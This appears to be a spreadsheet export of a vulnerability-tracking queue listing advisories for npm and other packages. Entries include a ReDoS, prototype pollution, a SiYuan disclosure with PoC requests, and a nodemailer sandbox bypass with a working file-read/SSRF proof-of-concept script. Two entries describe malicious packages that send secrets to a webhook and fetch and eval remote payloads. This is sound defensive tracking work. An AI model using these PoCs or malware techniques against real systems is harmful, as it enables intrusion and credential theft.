| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

Reachable through `colord()` and `getFormat()`, and through any method that accepts a color string — including `isEqual()`, `mix()` and `contrast()`. The affected matchers are `parseRgbaString` and `parseHslaString` (built in) and `parseHwbaString`, `parseLchaString`, `parseCmykaString` (plugins).

Growth is polynomial, not exponential — multi-kilobyte payloads are required for a noticeable stall.

### Who is affected

Applications that pass attacker-controlled strings of unbounded length to `colord()` — for example a server validating a color taken from a request body, JSON field, or uploaded stylesheet. `colord` applies no length limit before matching.

Typical client-side use with short input is not meaningfully affected.

### Patches

Fixed in **2.9.4**. The number is now written as `([+-]?(?:\d*\.\d+|\d+))`, which accepts exactly the same syntax but leaves only one way to match it, making rejection linear — 1 MB of input is rejected in ~5 ms.

### Workarounds

Reject or truncate color strings longer than a sane limit (e.g. 100 characters) before passing them to `colord`.</t></is></c><c r="T1649" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t></is></c></row><row r="1650"><c r="A1650" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1650" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1650" s="5" t="inlineStr"><is><t>CVE-2026-85063</t></is></c><c r="D1650" s="5" t="inlineStr" /><c r="E1650" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1650" s="5" t="inlineStr" /><c r="H1650" s="5" t="n"><v>0.003</v></c><c r="I1650" s="5" t="inlineStr" /><c r="J1650" s="5" t="inlineStr" /><c r="K1650" s="5" t="inlineStr" /><c r="L1650" s="5" t="inlineStr"><is><t>npm:csv-parse</t></is></c><c r="M1650" s="5" t="inlineStr"><is><t>7.0.2</t></is></c><c r="N1650" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1650" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1650" s="5" t="inlineStr" /><c r="R1650" s="5" t="inlineStr" /><c r="S1650" s="5" t="inlineStr"><is><t>### Impact
With columns: true and group_columns_by_name: true, a duplicated __proto__  header causes the duplicate-column branch to assign an array to obj['__proto__'], invoking the __proto__ setter and replacing the parsed record object's prototype with attacker-controlled data. Fixed in 7.0.2 (Object.hasOwn duplicate check + Object.defineProperty assignment).

### Patches
The problem been patched.

### Workarounds
Disable usage of both the columns and  group_columns_by_name options.

### References
issue #496, PR #497</t></is></c><c r="T1650" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t></is></c></row><row r="1651"><c r="A1651" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1651" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1651" s="5" t="inlineStr"><is><t>CVE-2026-86477</t></is></c><c r="D1651" s="5" t="inlineStr" /><c r="E1651" s="5" t="inlineStr" /><c r="F1651" s="5" t="inlineStr" /><c r="G1651" s="5" t="inlineStr" /><c r="H1651" s="5" t="inlineStr" /><c r="I1651" s="5" t="inlineStr" /><c r="J1651" s="5" t="inlineStr" /><c r="K1651" s="5" t="inlineStr" /><c r="L1651" s="5" t="inlineStr" /><c r="M1651" s="5" t="inlineStr" /><c r="N1651" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1651" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1651" s="5" t="inlineStr" /><c r="R1651" s="5" t="inlineStr" /><c r="S1651" s="5" t="inlineStr"><is><t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t></is></c><c r="T1651" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t></is></c></row><row r="1652"><c r="A1652" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1652" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1652" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D1652" s="5" t="inlineStr" /><c r="E1652" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1652" s="5" t="inlineStr" /><c r="H1652" s="5" t="inlineStr" /><c r="I1652" s="5" t="inlineStr" /><c r="J1652" s="5" t="inlineStr" /><c r="K1652" s="5" t="inlineStr" /><c r="L1652" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1652" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N1652" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1652" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1652" s="5" t="inlineStr" /><c r="R1652" s="5" t="inlineStr" /><c r="S1652" s="5" t="inlineStr"><is><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is></c><c r="T1652" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="1653"><c r="A1653" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1653" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1653" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D1653" s="5" t="inlineStr" /><c r="E1653" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1653" s="5" t="inlineStr" /><c r="H1653" s="5" t="inlineStr" /><c r="I1653" s="5" t="inlineStr" /><c r="J1653" s="5" t="inlineStr" /><c r="K1653" s="5" t="inlineStr" /><c r="L1653" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M1653" s="5" t="inlineStr" /><c r="N1653" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1653" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1653" s="5" t="inlineStr" /><c r="R1653" s="5" t="inlineStr" /><c r="S1653" s="5" t="inlineStr"><is><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is></c><c r="T1653" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="1654"><c r="A1654" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1654" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1654" s="5" t="inlineStr"><is><t>GHSA-2x7j-588g-ccc2</t></is></c><c r="D1654" s="5" t="inlineStr" /><c r="E1654" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1654" s="5" t="inlineStr" /><c r="H1654" s="5" t="inlineStr" /><c r="I1654" s="5" t="inlineStr" /><c r="J1654" s="5" t="inlineStr" /><c r="K1654" s="5" t="inlineStr" /><c r="L1654" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1654" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N1654" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1654" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1654" s="5" t="inlineStr" /><c r="R1654" s="5" t="inlineStr" /><c r="S1654" s="5" t="inlineStr"><is><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is></c><c r="T1654" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2</t></is></c></row><row r="1655"><c r="A1655" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1655" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1655" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D1655" s="5" t="inlineStr" /><c r="E1655" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1655" s="5" t="inlineStr" /><c r="H1655" s="5" t="inlineStr" /><c r="I1655" s="5" t="inlineStr" /><c r="J1655" s="5" t="inlineStr" /><c r="K1655" s="5" t="inlineStr" /><c r="L1655" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1655" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1655" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1655" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1655" s="5" t="inlineStr" /><c r="R1655" s="5" t="inlineStr" /><c r="S1655" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T1655" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="1656"><c r="A1656" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1656" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1656" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D1656" s="5" t="inlineStr" /><c r="E1656" s="5" t="inlineStr" /><c r="F1656" s="5" t="inlineStr" /><c r="G1656" s="5" t="inlineStr" /><c r="H1656" s="5" t="inlineStr" /><c r="I1656" s="5" t="inlineStr" /><c r="J1656" s="5" t="inlineStr" /><c r="K1656" s="5" t="inlineStr" /><c r="L1656" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M1656" s="5" t="inlineStr" /><c r="N1656" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1656" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1656" s="5" t="inlineStr" /><c r="R1656" s="5" t="inlineStr" /><c r="S1656" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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56" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="1657"><c r="A1657" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1657" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1657" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D1657" s="5" t="inlineStr" /><c r="E1657" s="5" t="inlineStr" /><c r="F1657" s="5" t="inlineStr" /><c r="G1657" s="5" t="inlineStr" /><c r="H1657" s="5" t="inlineStr" /><c r="I1657" s="5" t="inlineStr" /><c r="J1657" s="5" t="inlineStr" /><c r="K1657" s="5" t="inlineStr" /><c r="L1657" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M1657" s="5" t="inlineStr" /><c r="N1657" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1657" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1657" s="5" t="inlineStr" /><c r="R1657" s="5" t="inlineStr" /><c r="S1657" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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57" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="1658"><c r="A1658" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1658" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1658" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D1658" s="5" t="inlineStr" /><c r="E1658" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1658" s="5" t="inlineStr" /><c r="H1658" s="5" t="inlineStr" /><c r="I1658" s="5" t="inlineStr" /><c r="J1658" s="5" t="inlineStr" /><c r="K1658" s="5" t="inlineStr" /><c r="L1658" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M1658" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N1658" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1658" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1658" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1658" s="5" t="inlineStr" /><c r="R1658" s="5" t="inlineStr" /><c r="S1658" s="5" t="inlineStr"><is><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is></c><c r="T1658" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="1659"><c r="A1659" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1659" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D1659" s="5" t="inlineStr" /><c r="E1659" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1659" s="5" t="inlineStr" /><c r="H1659" s="5" t="inlineStr" /><c r="I1659" s="5" t="inlineStr" /><c r="J1659" s="5" t="inlineStr" /><c r="K1659" s="5" t="inlineStr" /><c r="L1659" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M1659" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N1659" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1659" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1659" s="5" t="inlineStr" /><c r="R1659" s="5" t="inlineStr" /><c r="S1659" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T1659" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="1660"><c r="A1660" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1660" s="5" t="inlineStr"><is><t>GHSA-8m3c-c648-2xjj</t></is></c><c r="D1660" s="5" t="inlineStr" /><c r="E1660" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1660" s="5" t="inlineStr" /><c r="H1660" s="5" t="inlineStr" /><c r="I1660" s="5" t="inlineStr" /><c r="J1660" s="5" t="inlineStr" /><c r="K1660" s="5" t="inlineStr" /><c r="L1660" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M1660" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N1660" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1660" s="5" t="inlineStr" /><c r="R1660" s="5" t="inlineStr" /><c r="S1660" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's `disableFileAccess` / `disableUrlAccess` options are a security sandbox that lets an application forbid untrusted message content (`html`/`text`/attachment `path`/`href`) from reading local files or making outbound HTTP(S) requests. The fix for GHSA-wqvq-jvpq-h66f (commit `5f69497`) threaded these flags through the library's internal resolution paths (`MailMessage.resolveAll()` and `_convertDataImages()`), but the public plugin API `MailMessage.resolveContent(...args)` (`lib/mailer/mail-message.js:41-43`) remains a raw passthrough to `shared.resolveContent()`.

When called with the documented legacy signature `mail.resolveContent(data, key, callback)`, `shared.resolveContent` normalizes the missing options argument to an empty object (`options = options || {}`, `lib/shared/index.js:530`). The message-level flags that the `MailMessage` constructor already copied into `mail.data` (`lib/mailer/mail-message.js:34-38`) are silently discarded, so `resolveContentValue` skips both access-control guards and reaches `nmfetch(url)` (SSRF, `lib/shared/index.js:588`) or `fs.createReadStream(path)` (arbitrary file read, `lib/shared/index.js:597`).

A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T1660" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj</t></is></c></row><row r="1661"><c r="A1661" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1661" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D1661" s="5" t="inlineStr" /><c r="E1661" s="5" t="inlineStr" /><c r="F1661" s="5" t="inlineStr" /><c r="G1661" s="5" t="inlineStr" /><c r="H1661" s="5" t="inlineStr" /><c r="I1661" s="5" t="inlineStr" /><c r="J1661" s="5" t="inlineStr" /><c r="K1661" s="5" t="inlineStr" /><c r="L1661" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M1661" s="5" t="inlineStr" /><c r="N1661" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1661" s="5" t="inlineStr" /><c r="R1661" s="5" t="inlineStr" /><c r="S1661" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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1" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="1662"><c r="A1662" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1662" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D1662" s="5" t="inlineStr" /><c r="E1662" s="5" t="inlineStr" /><c r="F1662" s="5" t="inlineStr" /><c r="G1662" s="5" t="inlineStr" /><c r="H1662" s="5" t="inlineStr" /><c r="I1662" s="5" t="inlineStr" /><c r="J1662" s="5" t="inlineStr" /><c r="K1662" s="5" t="inlineStr" /><c r="L1662" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M1662" s="5" t="inlineStr" /><c r="N1662" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1662" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1662" s="5" t="inlineStr" /><c r="R1662" s="5" t="inlineStr" /><c r="S1662" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

